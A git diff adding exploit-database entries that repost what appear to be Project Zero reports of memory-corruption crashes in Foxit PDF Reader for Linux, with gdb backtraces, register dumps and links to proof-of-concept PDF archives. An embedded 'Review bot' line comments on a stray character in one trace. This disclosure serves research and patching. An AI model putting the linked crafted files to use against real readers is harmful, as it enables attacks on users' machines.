+#3 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
+#4 0x00000000006c6364 in CRichTextXML::ParseXML2Text() ()
+#5 0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) ()
+#6 0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) ()
+#7 0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) ()
+#8 0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) ()
+#9 0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) ()
+#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) ()
+#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) ()
+#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) ()
+#13 0x00000000005d2475 in 
CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) () +#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) () +#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) () +#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0) + at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901 +#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670) + at ../../Readerlite/ReaderLite/src/preview.cpp:3204 +x#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180) + at ../../Readerlite/ReaderLite/src/preview.cpp:1443 +#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520) + at ../../Readerlite/ReaderLite/src/preview.cpp:2386 +#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() () +#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 
0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () +---Type to continue, or q to quit--- + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff74bd434 in 
QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#45 0x00007ffff74e0973 in ?? 
() from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#54 0x00007ffff4a7a048 in ?? 
() from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) ()
+ from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#57 0x00007ffff633f96b in QEventLoop::exec(QFlags) ()
+ from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
+(gdb) x/10i $rip
+=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>: cmpq $0x0,0x0(%r13)
+ 0xab4684 <_ZN14CFX_WideStringaSERKS_+56>: js 0xab4692 <_ZN14CFX_WideStringaSERKS_+70>
+ 0xab4686 <_ZN14CFX_WideStringaSERKS_+58>: test %rbp,%rbp
+ 0xab4689 <_ZN14CFX_WideStringaSERKS_+61>: je 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
+ 0xab468b <_ZN14CFX_WideStringaSERKS_+63>: cmpq $0x0,0x0(%rbp)
+ 0xab4690 <_ZN14CFX_WideStringaSERKS_+68>: jns 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
+ 0xab4692 <_ZN14CFX_WideStringaSERKS_+70>: mov 0x8(%rbp),%esi
+ 0xab4695 <_ZN14CFX_WideStringaSERKS_+73>: lea 0x10(%rbp),%rdx
+ 0xab4699 <_ZN14CFX_WideStringaSERKS_+77>: mov %rbx,%rdi
+ 0xab469c <_ZN14CFX_WideStringaSERKS_+80>: callq 0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw>
+(gdb) info reg $r13
+r13 0x740000006e 498216206446
+--- cut ---
+
+Attached is a proof of concept PDF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39942.zip
+
diff --git a/platforms/linux/dos/39943.txt b/platforms/linux/dos/39943.txt
new file mode 100755
index 000000000..a00d980d6
--- /dev/null
+++ b/platforms/linux/dos/39943.txt
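Review bot: Frame 18 of the backtrace in this file is written `x#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent`, with a stray `x` in front of the frame marker that no other frame carries; it reads like a leftover keystroke from the capture session and should be `#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180)` so the frame numbering stays parseable by anyone diffing the trace against a fresh run.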
@@ -0,0 +1,123 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743 + +We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) () +(gdb) info reg $rdx +rdx 0x90ff9fc23e15101d -7998498756572671971 +(gdb) where +#0 0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) () +#1 0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) () +#2 0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) () +#3 0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() () +#4 0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() () +#5 0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) () +#6 0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#7 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#8 0x00000000007fb00d 
in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#9 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) () +#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() () +#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) () +#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) () +#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) () +#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) () +#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) () +#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) () +#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) () +#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() () +#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from 
/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, Q---Type to continue, or q to quit--- +Region const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 
+#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#43 0x00007ffff74e0973 in ?? 
() from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#52 0x00007ffff4a7a048 in ?? 
() from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#55 0x00007ffff633f96b in QEventLoop::exec(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310 +(gdb) x/10i $rip +=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>: mov 0x4(%rdx),%rcx + 0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>: mov %rcx,(%rbx) + 0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>: + movslq 0x320(%rax),%rcx + 0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>: mov 0x4(%rbx),%esi + 0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>: + movzbl 0x19(%rdx,%rcx,1),%ecx + 0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>: shl %cl,%esi + 0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>: + movslq 0x320(%rax),%rcx + 0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>: mov %esi,0x4(%rbx) + 0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>: + movzbl 0x3a(%rdx,%rcx,1),%ecx + 0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>: mov (%rbx),%edx +(gdb) info reg $rdx +rdx 0x90ff9fc23e15101d -7998498756572671971 +(gdb) x/10wx $dx +0x101d: Cannot access memory at address 0x101d +(gdb) x/10wx $rdx +0x90ff9fc23e15101d: Cannot access memory at address 0x90ff9fc23e15101d +--- cut --- + +Attached is a proof of concept PDF file. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39943.zip
+
diff --git a/platforms/linux/dos/39944.txt b/platforms/linux/dos/39944.txt
new file mode 100755
index 000000000..9c001388b
--- /dev/null
+++ b/platforms/linux/dos/39944.txt
@@ -0,0 +1,158 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742 + +We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way: + +$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf + +The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too. + +An example excerpt from the crash log is as follows: + +--- cut --- +Program received signal SIGSEGV, Segmentation fault. +0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const () +(gdb) where +#0 0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const () +#1 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const () +#2 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const () +#3 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const () +#4 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#5 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) () +#6 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) () +#7 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#8 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#9 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#11 
0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) () +#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) () +#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0) + at ../../Readerlite/ReaderLite/src/childframe.cpp:91 +#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60) + at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61 +#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720, + filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99 +#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=..., + wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216 +#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...) + at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941 +#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...) 
+ at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434 +#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301 +(gdb) x/10i $rip +=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>: + mov 0x0(%r13,%rbp,8),%rcx + 0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>: test %rcx,%rcx + 0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>: + jne 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117> + 0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>: inc %rbp + 0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>: movzbl 0xe(%rbx),%eax + 0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>: cmp %ebp,%eax + 0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>: + jg 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94> + 0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>: + jmp 0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145> + 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>: mov 0xc(%rsp),%esi + 0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>: mov %r15,%r9 +(gdb) info reg +rax 0x7c 124 +rbx 0x1a66130 27681072 +rcx 0xe1a704fcae02ca58 -2186773610767398312 +rdx 0x7fffffffceec 140737488342764 +rsi 0x2f 47 +rdi 0x1a66130 27681072 +rbp 0x0 0x0 +rsp 0x7fffffffce90 0x7fffffffce90 +r8 0xab0f92 11210642 +r9 0x6a83f4ca 1787032778 +r10 0xfd 253 +r11 0x0 0 +r12 0x7fffffffceec 140737488342764 +r13 0xe1a704fcae02ca58 -2186773610767398312 +r14 0xab0f92 11210642 +r15 0x6a83f4ca 1787032778 +rip 0xaab96c 0xaab96c +eflags 0x10202 [ IF RF ] +cs 0x33 51 +ss 0x2b 43 +ds 0x0 0 +es 0x0 0 +fs 0x0 0 +gs 0x0 0 +--- cut --- + 